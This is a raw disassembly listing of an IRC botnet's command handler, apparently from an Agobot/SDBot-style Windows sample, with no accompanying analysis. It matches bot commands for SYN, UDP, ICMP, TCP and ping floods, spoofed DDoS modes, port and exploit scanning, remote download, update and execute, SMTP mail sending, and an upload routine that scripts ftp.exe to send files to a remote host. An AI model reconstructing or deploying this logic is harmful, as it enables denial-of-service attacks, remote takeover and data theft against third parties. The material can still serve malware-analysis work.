push [ebp+arg_8]
push offset aC_part ; "c_part"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408B54
push [ebp+arg_8]
push offset aC_p ; "c_p"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408B54
push [ebp+arg_8]
push offset aTarga3 ; "targa3"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408A5C
push [ebp+arg_8]
push offset aT3 ; "t3"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408A5C
push [ebp+arg_8]
push offset aTsunami ; "tsunami"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40898B
push [ebp+arg_8]
push offset aTsn ; "tsn"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40898B
push [ebp+arg_8]
push offset aRepeat ; "repeat"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4088C6
push [ebp+arg_8]
push offset aRp ; "rp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4088C6
push [ebp+arg_8]
push offset aDelay ; "delay"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408829
push [ebp+arg_8]
push offset aDe ; "de"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408829
push [ebp+arg_8]
push offset aUpdate ; "update"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4086AD
push [ebp+arg_8]
push offset aUp_0 ; "up"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4086AD
push [ebp+arg_8]
push offset aExecute ; "execute"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408614
push [ebp+arg_8]
push offset aE ; "e"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408614
push [ebp+arg_8]
push offset aFindfile ; "findfile"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408508
push [ebp+arg_8]
push offset aFf ; "ff"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408508
push [ebp+arg_8]
push offset aRename ; "rename"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4084B7
push [ebp+arg_8]
push offset aMv ; "mv"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4084B7
push [ebp+arg_8]
push offset aIcmpflood ; "icmpflood"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4083BD
push [ebp+arg_8]
push offset aIcmp ; "icmp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4083BD
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_4076C4
push [ebp+arg_8]
push offset aClone_0 ; "clone"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4082D6
push [ebp+arg_8]
push offset aC ; "c"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4082D6
push [ebp+arg_8]
push offset aDdos_syn ; "ddos.syn"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4081C5
push [ebp+arg_8]
push offset aDdos_ack ; "ddos.ack"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4081C5
push [ebp+arg_8]
push offset aDdos_random ; "ddos.random"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4081C5
push [ebp+arg_8]
push offset aWisdom_udp ; "wisdom.udp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_406A17
push 7Fh
lea eax, [ebp+var_327C]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_31FC]
push edi
push eax
call sub_41E510
push esi
lea eax, [ebp+var_317C]
push [ebp+arg_0]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_30FC]
push [ebp+var_88]
push eax
call sub_41E510
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_3074], eax
push ebx
lea eax, [ebp+var_2C0]
push 13h
push eax
mov [ebp+var_3078], edi
mov [ebp+var_3280], esi
call sub_40B691
add esp, 3Ch
mov [ebp+var_307C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3280]
push ebx
push eax
push offset sub_414F53
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_307C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_406A0A
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_441DA0
jmp loc_404014
; ---------------------------------------------------------------------------
loc_406A02: ; CODE XREF: sub_401C87+4D89�j
push 32h
call ds:dword_4F534C ; Sleep
loc_406A0A: ; CODE XREF: sub_401C87+4D68�j
cmp [ebp+var_3070], ebx
jz short loc_406A02
jmp loc_404023
; ---------------------------------------------------------------------------
loc_406A17: ; CODE XREF: sub_401C87+4CBE�j
push [ebp+arg_8]
push offset aSynflood ; "synflood"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4080DE
push [ebp+arg_8]
push offset aSyn ; "syn"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4080DE
push [ebp+arg_8]
push offset aSkysyn ; "skysyn"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_406B43
push 7Fh
lea eax, [ebp+var_36A4]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_3624]
push edi
push eax
call sub_41E510
push esi
lea eax, [ebp+var_35A4]
push [ebp+arg_0]
push eax
call sub_41E510
push esi
lea eax, [ebp+var_3524]
push [ebp+var_88]
push eax
call sub_41E510
push [ebp+arg_0]
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_34A0], eax
mov eax, [ebp+var_8]
push edi
push [ebp+arg_10]
mov [ebp+var_349C], eax
lea eax, [ebp+var_2C0]
mov [ebp+var_36A8], esi
push offset dword_441DF8
push eax
call sub_41EA60
add esp, 44h
lea eax, [ebp+var_2C0]
push ebx
push 10h
push eax
call sub_40B691
add esp, 0Ch
mov [ebp+var_34A4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_36A8]
push ebx
push eax
push offset sub_413ECE
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_34A4]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_406B36
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_441E28
jmp loc_4082A3
; ---------------------------------------------------------------------------
loc_406B2E: ; CODE XREF: sub_401C87+4EB5�j
push 32h
call ds:dword_4F534C ; Sleep
loc_406B36: ; CODE XREF: sub_401C87+4E94�j
cmp [ebp+var_3498], ebx
jz short loc_406B2E
jmp loc_4082B2
; ---------------------------------------------------------------------------
loc_406B43: ; CODE XREF: sub_401C87+4DCF�j
push [ebp+arg_8]
push offset aPhatwonk ; "phatwonk"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407FF7
push [ebp+arg_8]
push offset aWonk ; "wonk"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407FF7
push [ebp+arg_8]
push offset aDownload ; "download"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407EBD
push [ebp+arg_8]
push offset aDl ; "dl"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407EBD
push [ebp+arg_8]
push offset aRedirect ; "redirect"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407DC4
push [ebp+arg_8]
push offset aRd ; "rd"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407DC4
push [ebp+arg_8]
push offset aScan ; "scan"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407CD2
push [ebp+arg_8]
push offset aSc ; "sc"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407CD2
push [ebp+arg_8]
push offset aC_privmsg ; "c_privmsg"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407BF5
push [ebp+arg_8]
push offset aC_pm ; "c_pm"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407BF5
push [ebp+arg_8]
push offset aC_action ; "c_action"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407ADB
push [ebp+arg_8]
push offset aC_a ; "c_a"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407ADB
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_4076C4
push [ebp+arg_8]
push offset aPortscan ; "portscan"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4079D6
push [ebp+arg_8]
push offset aPsc ; "psc"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4079D6
push [ebp+arg_8]
push offset aAdvscan ; "advscan"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4074D3
push [ebp+arg_8]
push offset aAsc ; "asc"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4074D3
push [ebp+arg_8]
push offset aUdpflood ; "udpflood"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4073B4
push [ebp+arg_8]
push offset aUdp ; "udp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4073B4
push [ebp+arg_8]
push offset aU ; "u"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4073B4
push [ebp+arg_8]
push offset aNetsend ; "netsend"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407298
push [ebp+arg_8]
push offset aNs ; "ns"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407298
push [ebp+arg_8]
push offset aPingflood ; "pingflood"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407172
push [ebp+arg_8]
push offset aPing_0 ; "ping"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407172
push [ebp+arg_8]
push offset aP ; "p"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_407172
push [ebp+arg_8]
push offset aTcpflood ; "tcpflood"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_406FAE
push [ebp+arg_8]
push offset aTcp ; "tcp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_406FAE
push [ebp+arg_8]
push offset aEmail ; "email"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_406F56
push [ebp+arg_10]
lea eax, [ebp+var_47EC]
push eax
call sub_41F620
push edi
call sub_41E710
push [ebp+arg_0]
mov [ebp+arg_10], eax
lea eax, [ebp+var_4188]
push eax
call sub_41F620
push [ebp+arg_18]
lea eax, [ebp+var_4588]
push eax
call sub_41F620
push offset asc_441F2E ; " "
push offset a__0 ; "_"
push [ebp+esi+var_7C]
call sub_4189CD
push eax
lea eax, [ebp+var_4288]
push eax
call sub_41F620
add esp, 30h
lea eax, [ebp+var_5588]
push eax
push 101h
call ds:dword_4E2F38 ; WSAStartup
lea eax, [ebp+var_47EC]
push eax
call ds:dword_4E304C ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call ds:dword_4E3048 ; socket
push [ebp+arg_10]
mov esi, eax
mov [ebp+var_31C], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_318], eax
call ds:dword_4E2FC8 ; htons
mov [ebp+var_31A], ax
lea eax, [ebp+var_4288]
push eax
lea eax, [ebp+var_4188]
push eax
lea eax, [ebp+var_4288]
push eax
lea eax, [ebp+var_4588]
push eax
lea eax, [ebp+var_4188]
push eax
lea eax, [ebp+var_5988]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_41EA60
add esp, 1Ch
lea eax, [ebp+var_31C]
push 10h
push eax
push esi
call ds:dword_4E2F70 ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_4088]
push edi
push eax
push esi
call ds:dword_4E2FE0 ; recv
lea eax, [ebp+var_4088]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_5988]
push eax
push esi
call ds:dword_4E3018 ; send
push ebx
lea eax, [ebp+var_4088]
push edi
push eax
push esi
call ds:dword_4E2FE0 ; recv
push esi
call ds:dword_4E3060 ; closesocket
call ds:dword_4E2F20 ; WSACleanup
lea eax, [ebp+var_4588]
push eax
push offset unk_441F84
loc_406F0F: ; CODE XREF: sub_401C87+2E78�j
; sub_401C87+671C�j ...
lea eax, [ebp+var_2C0]
loc_406F15: ; CODE XREF: sub_401C87+6A21�j
push eax
call sub_41EA60
loc_406F1B: ; CODE XREF: sub_401C87+243F�j
add esp, 0Ch
loc_406F1E: ; CODE XREF: sub_401C87+4564�j
; sub_401C87+45BC�j ...
cmp [ebp+var_8], ebx
jnz short loc_406F3F
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_406F3F: ; CODE XREF: sub_401C87+2987�j
; sub_401C87+299C�j ...
mov esi, [ebp+arg_24]
loc_406F42: ; CODE XREF: sub_401C87+90F�j
; sub_401C87+7978�j ...
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
pop ecx
mov eax, esi
jmp loc_409C2A
; ---------------------------------------------------------------------------
loc_406F56: ; CODE XREF: sub_401C87+5132�j
push [ebp+arg_8]
push offset aHttpcon ; "httpcon"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_406F80
push [ebp+arg_8]
push offset aHcon ; "hcon"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_407523
loc_406F80: ; CODE XREF: sub_401C87+52E0�j
push [ebp+esi+var_7C]
push [ebp+arg_18]
push [ebp+arg_0]
push edi
call sub_41E710
pop ecx
push eax
push [ebp+arg_10]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_4109F3
jmp loc_409A64
; ---------------------------------------------------------------------------
loc_406FAE: ; CODE XREF: sub_401C87+5104�j
; sub_401C87+511B�j
push [ebp+arg_10]
mov esi, 80h
lea eax, [ebp+var_1354]
push esi
push eax
call sub_41EC30
lea eax, [ebp+var_1354]
push eax
push offset aSyn_0 ; "syn"
call sub_41F7E0
add esp, 14h
test eax, eax
jz short loc_407013
lea eax, [ebp+var_1354]
push eax
push offset aAck ; "ack"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_407013
lea eax, [ebp+var_1354]
push eax
push offset aRandom_0 ; "random"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_407013
push offset unk_441FC8
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_407013: ; CODE XREF: sub_401C87+5352�j
; sub_401C87+5369�j ...
push [ebp+arg_18]
call sub_41E710
cmp eax, ebx
pop ecx
mov [ebp+var_124C], eax
jle loc_407135
push [ebp+arg_10]
lea eax, [ebp+var_1354]
push esi
push eax
call sub_41EC30
push edi
lea eax, [ebp+var_13D4]
push esi
push eax
call sub_41EC30
push [ebp+arg_0]
call sub_41E710
mov [ebp+var_1250], eax
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+var_88]
setnz al
mov [ebp+var_1248], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13D8], eax
lea eax, [ebp+var_12D4]
push esi
push eax
call sub_41EC30
mov eax, [ebp+var_4]
add esp, 28h
cmp [ebp+var_1248], ebx
mov [ebp+var_1244], eax
mov eax, [ebp+var_8]
mov [ebp+var_1240], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_4070AA
mov eax, offset aNormal ; "Normal"
loc_4070AA: ; CODE XREF: sub_401C87+541C�j
push [ebp+arg_18]
push [ebp+arg_0]
push edi
push [ebp+arg_10]
push eax
push offset unk_442004
lea eax, [ebp+var_2C0]
push 200h
push eax
call sub_41EC30
push ebx
lea eax, [ebp+var_2C0]
push 14h
push eax
call sub_40B691
add esp, 2Ch
mov [ebp+var_1254], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_13D8]
push ebx
push eax
push offset sub_4146C8
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1254]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_40712B
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442038
jmp loc_406190
; ---------------------------------------------------------------------------
loc_407123: ; CODE XREF: sub_401C87+54AA�j
push 32h
call ds:dword_4F534C ; Sleep
loc_40712B: ; CODE XREF: sub_401C87+5489�j
cmp [ebp+var_123C], ebx
jz short loc_407123
jmp short loc_407148
; ---------------------------------------------------------------------------
loc_407135: ; CODE XREF: sub_401C87+539D�j
push offset unk_442070
loc_40713A: ; CODE XREF: sub_401C87+1FC5�j
; sub_401C87+1FDB�j ...
lea eax, [ebp+var_2C0]
loc_407140: ; CODE XREF: sub_401C87+4316�j
push eax
call sub_41EA60
pop ecx
pop ecx
loc_407148: ; CODE XREF: sub_401C87+20F6�j
; sub_401C87+25C3�j ...
cmp [ebp+var_8], ebx
jnz loc_402593
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
loc_407165: ; CODE XREF: sub_401C87+23B5�j
call sub_409C75
add esp, 14h
jmp loc_402593
; ---------------------------------------------------------------------------
loc_407172: ; CODE XREF: sub_401C87+50BF�j
; sub_401C87+50D6�j ...
cmp ds:dword_4E30B4, ebx
jnz loc_40727D
mov eax, [ebp+var_8]
push 7Fh
push [ebp+arg_10]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_4]
mov [ebp+var_FF8], eax
lea eax, [ebp+var_108C]
push eax
call sub_41E510
push edi
call sub_41E710
push [ebp+arg_0]
mov [ebp+var_100C], eax
call sub_41E710
push [ebp+arg_18]
mov [ebp+var_1008], eax
call sub_41E710
push 7Fh
mov [ebp+var_1004], eax
push [ebp+var_88]
lea eax, [ebp+var_110C]
push eax
call sub_41E510
push [ebp+var_1004]
mov eax, [ebp+arg_4]
mov [ebp+var_1110], eax
lea eax, [ebp+var_108C]
push [ebp+var_1008]
push eax
lea eax, [ebp+var_2C0]
push [ebp+var_100C]
push offset unk_4420A8
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 16h
push eax
call sub_40B691
add esp, 48h
mov [ebp+var_FFC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1110]
push ebx
push eax
push offset sub_413B2B
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_FFC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_407270
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4420F0
jmp loc_406190
; ---------------------------------------------------------------------------
loc_407268: ; CODE XREF: sub_401C87+55EF�j
push 32h
call ds:dword_4F534C ; Sleep
loc_407270: ; CODE XREF: sub_401C87+55CE�j
cmp [ebp+var_FF0], ebx
jz short loc_407268
jmp loc_407148
; ---------------------------------------------------------------------------
loc_40727D: ; CODE XREF: sub_401C87+54F1�j
push 1FFh
lea eax, [ebp+var_2C0]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_41E510
jmp loc_40619C
; ---------------------------------------------------------------------------
loc_407298: ; CODE XREF: sub_401C87+5091�j
; sub_401C87+50A8�j
push edi
lea eax, [ebp+var_2C0]
push [ebp+arg_10]
push [ebp+arg_0]
push offset unk_442140
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
push [ebp+arg_0]
call sub_41BC70
push edi
mov [ebp+arg_20], eax
call sub_41BC70
mov ecx, [ebp+arg_20]
push [ebp+arg_10]
add ecx, eax
mov [ebp+arg_20], ecx
call sub_41BC70
mov ecx, [ebp+arg_20]
push [ebp+arg_8]
add ecx, eax
mov [ebp+arg_20], ecx
call sub_41BC70
add eax, [ebp+var_C]
mov ecx, [ebp+arg_20]
push [ebp+arg_18]
lea eax, [eax+ecx+7]
push eax
call sub_41EBB0
add esp, 40h
mov [ebp+arg_C], eax
push [ebp+arg_0]
call sub_41E710
mov edi, [ebp+arg_1C]
cmp eax, ebx
pop ecx
mov [ebp+arg_14], eax
mov [ebp+arg_20], ebx
jle short loc_4073A0
loc_407329: ; CODE XREF: sub_401C87+56C6�j
push [ebp+arg_C]
push edi
push [ebp+arg_10]
call sub_419229
add esp, 0Ch
cmp eax, 1
mov [ebp+arg_1C], eax
jz short loc_407351
cmp eax, ebx
jnz short loc_407370
inc [ebp+arg_20]
mov eax, [ebp+arg_20]
cmp eax, [ebp+arg_14]
jl short loc_407329
jmp short loc_4073A9
; ---------------------------------------------------------------------------
loc_407351: ; CODE XREF: sub_401C87+56B7�j
push ebx
push [ebp+var_4]
push offset unk_44217C
loc_40735A: ; CODE XREF: sub_401C87+572B�j
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
jmp loc_407523
; ---------------------------------------------------------------------------
loc_407370: ; CODE XREF: sub_401C87+56BB�j
push [ebp+arg_1C]
lea eax, [ebp+var_2C0]
push offset unk_4421B4
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 20h
loc_4073A0: ; CODE XREF: sub_401C87+56A0�j
cmp [ebp+arg_1C], ebx
jnz loc_407523
loc_4073A9: ; CODE XREF: sub_401C87+56C8�j
push ebx
push [ebp+var_4]
push offset unk_4421E8
jmp short loc_40735A
; ---------------------------------------------------------------------------
loc_4073B4: ; CODE XREF: sub_401C87+504C�j
; sub_401C87+5063�j ...
mov eax, [ebp+var_8]
push 7Fh
push [ebp+arg_10]
mov [ebp+var_C64], eax
mov eax, [ebp+var_4]
mov [ebp+var_C68], eax
lea eax, [ebp+var_CFC]
push eax
call sub_41E510
push edi
call sub_41E710
push [ebp+arg_0]
mov [ebp+var_C7C], eax
call sub_41E710
push [ebp+arg_18]
mov [ebp+var_C78], eax
call sub_41E710
mov esi, [ebp+esi+var_7C]
add esp, 18h
cmp esi, ebx
mov [ebp+var_C74], eax
jz short loc_407419
push esi
call sub_41E710
pop ecx
mov [ebp+var_C70], eax
jmp short loc_40741F
; ---------------------------------------------------------------------------
loc_407419: ; CODE XREF: sub_401C87+5781�j
mov [ebp+var_C70], ebx
loc_40741F: ; CODE XREF: sub_401C87+5790�j
push 7Fh
lea eax, [ebp+var_D7C]
push [ebp+var_88]
push eax
call sub_41E510
push [ebp+var_C74]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_CFC]
mov [ebp+var_D80], esi
push [ebp+var_C78]
push eax
lea eax, [ebp+var_2C0]
push [ebp+var_C7C]
push offset unk_442220
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 17h
push eax
call sub_40B691
add esp, 30h
mov [ebp+var_C6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_D80]
push ebx
push eax
push offset sub_413CB7
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_C6C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4074C6
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_442268
jmp loc_4082A3
; ---------------------------------------------------------------------------
loc_4074BE: ; CODE XREF: sub_401C87+5845�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4074C6: ; CODE XREF: sub_401C87+5824�j
cmp [ebp+var_C60], ebx
jz short loc_4074BE
jmp loc_4082B2
; ---------------------------------------------------------------------------
loc_4074D3: ; CODE XREF: sub_401C87+501E�j
; sub_401C87+5035�j
push 0Bh
call sub_40B8D3
push edi
mov [ebp+arg_1C], eax
call sub_41E710
add eax, [ebp+arg_1C]
pop ecx
pop ecx
cmp eax, 1F4h
jle loc_4076CC
push [ebp+arg_1C]
lea eax, [ebp+var_2C0]
push offset unk_4422A0
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 20h
loc_407523: ; CODE XREF: sub_401C87+52F3�j
; sub_401C87+56E4�j ...
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz loc_4076C4
push [ebp+arg_8]
push offset aUpload ; "upload"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_409A67
push 4
push esi
call sub_417264
pop ecx
test eax, eax
pop ecx
jnz short loc_40759B
push esi
push offset unk_4422E8
loc_40755A: ; CODE XREF: sub_401C87+7BD8�j
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 0Ch
loc_407569: ; CODE XREF: sub_401C87+7285�j
; sub_401C87+7BF0�j
cmp [ebp+var_8], ebx
jnz short loc_40758A
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
loc_407582: ; CODE XREF: sub_401C87+6EB6�j
call sub_409C75
add esp, 14h
loc_40758A: ; CODE XREF: sub_401C87+26D0�j
; sub_401C87+26E5�j ...
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
jmp loc_402213
; ---------------------------------------------------------------------------
loc_40759B: ; CODE XREF: sub_401C87+58CB�j
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
pop ecx
call sub_41EB70
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_41EB70
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_41EB70
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_51F8]
push edx
push eax
lea eax, [ebp+var_2E58]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_41EA60
lea eax, [ebp+var_2E58]
push offset aAb ; "ab"
push eax
call sub_41E490
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_4076C4
push esi
push [ebp+arg_18]
push [ebp+arg_0]
push edi
push [ebp+arg_10]
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_41F4E0
push [ebp+arg_24]
call sub_41BCF0
lea eax, [ebp+var_2E58]
push eax
lea eax, [ebp+var_4CF0]
push offset aSS_0 ; "-s:%s"
push eax
call sub_41EA60
add esp, 2Ch
lea eax, [ebp+var_4CF0]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen_0 ; "open"
push ebx
call ds:dword_4E2F34
push [ebp+arg_10]
test eax, eax
push esi
jz short loc_407667
push offset unk_442358
jmp short loc_40766C
; ---------------------------------------------------------------------------
loc_407667: ; CODE XREF: sub_401C87+59D7�j
push offset unk_442380
loc_40766C: ; CODE XREF: sub_401C87+59DE�j
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_407695
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_407695: ; CODE XREF: sub_401C87+59F0�j
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
jmp short loc_4076AF
; ---------------------------------------------------------------------------
loc_4076A3: ; CODE XREF: sub_401C87+5A3B�j
lea eax, [ebp+var_2E58]
push eax
call sub_41F470
loc_4076AF: ; CODE XREF: sub_401C87+5A1A�j
lea eax, [ebp+var_2E58]
push 4
push eax
call sub_417264
add esp, 0Ch
test eax, eax
jnz short loc_4076A3
loc_4076C4: ; CODE XREF: sub_401C87+5B�j
; sub_401C87+392�j ...
xor eax, eax
inc eax
jmp loc_409C2A
; ---------------------------------------------------------------------------
loc_4076CC: ; CODE XREF: sub_401C87+5866�j
push [ebp+arg_10]
call sub_41E710
push edi
mov [ebp+var_370], eax
call sub_41E710
push [ebp+arg_0]
mov [ebp+var_358], eax
call sub_41E710
add esp, 0Ch
cmp eax, 5
mov [ebp+var_36C], eax
jnb short loc_407705
push 5
pop eax
mov [ebp+var_36C], eax
loc_407705: ; CODE XREF: sub_401C87+5A73�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_407712
mov [ebp+var_36C], ecx
loc_407712: ; CODE XREF: sub_401C87+5A83�j
push [ebp+arg_18]
call sub_41E710
mov [ebp+var_368], eax
mov eax, 320h
cmp [ebp+var_368], eax
pop ecx
jbe short loc_407734
mov [ebp+var_368], eax
loc_407734: ; CODE XREF: sub_401C87+5AA5�j
or [ebp+var_354], 0FFFFFFFFh
cmp ds:dword_4481F0, ebx
mov [ebp+arg_20], ebx
jz short loc_407783
mov edi, offset dword_4481F0
loc_40774B: ; CODE XREF: sub_401C87+5ADE�j
push [ebp+arg_10]
lea eax, [edi-28h]
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_407769
inc [ebp+arg_20]
add edi, 40h
cmp [edi], ebx
jnz short loc_40774B
jmp short loc_407783
; ---------------------------------------------------------------------------
loc_407769: ; CODE XREF: sub_401C87+5AD4�j
mov eax, [ebp+arg_20]
mov ecx, eax
mov [ebp+var_354], eax
shl ecx, 6
mov ecx, ds:dword_4481F0[ecx]
mov [ebp+var_370], ecx
loc_407783: ; CODE XREF: sub_401C87+5ABD�j
; sub_401C87+5AE0�j
cmp [ebp+var_370], ebx
jnz short loc_407795
push offset unk_4423B0
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_407795: ; CODE XREF: sub_401C87+5B02�j
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
